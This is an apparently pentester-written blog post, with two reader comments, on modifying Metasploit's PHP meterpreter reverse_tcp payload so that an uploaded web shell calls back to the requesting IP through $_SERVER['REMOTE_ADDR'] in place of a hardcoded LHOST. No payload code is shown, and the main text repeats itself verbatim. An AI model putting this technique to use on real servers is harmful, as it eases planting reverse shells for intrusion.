As a metasploit dogs.. U alway try to integrate any vulnerabilities that you found during pentest with metasploit. One of my favourite metasploit payloads is PHP/meterpreter/reverse_tcp.
Now having said that, Metasploit is not really smart !!! (At least is not efficient in every scenario.)
For example suppose we generate the php/meterpreter/reverse_tcp payload.
Notice that u would always need to specified the LHOST.
This will caused an inconvenience in a sense that if u r in an environment where your IP address will always changes (for my sake let say i hate to register domains/or behind a shadowed network ).
Checking the payload output
You noticed that reverse remote IP Address is hardcoded in the payload..
What we can do is we can replace the $ip strings with remote addr global server $_SERVER['REMOTE_ADDR'] .
Now we can upload it anywhere we want and we don`t have to setup our LHOST every again :). This trick can also be applied to jsp and asp files but i left that parts to you guys.
Now having said that, Metasploit is not really smart !!! (At least is not efficient in every scenario.)
For example suppose we generate the php/meterpreter/reverse_tcp payload.
Notice that u would always need to specified the LHOST.
This will caused an inconvenience in a sense that if u r in an environment where your IP address will always changes (for my sake let say i hate to register domains/or behind a shadowed network ).
Checking the payload output
You noticed that reverse remote IP Address is hardcoded in the payload..
What we can do is we can replace the $ip strings with remote addr global server $_SERVER['REMOTE_ADDR'] .
Now we can upload it anywhere we want and we don`t have to setup our LHOST every again :). This trick can also be applied to jsp and asp files but i left that parts to you guys.
2 comments:
I use 0.0.0.0 to bind to all interfaces.
Der, you can use setg.
Post a Comment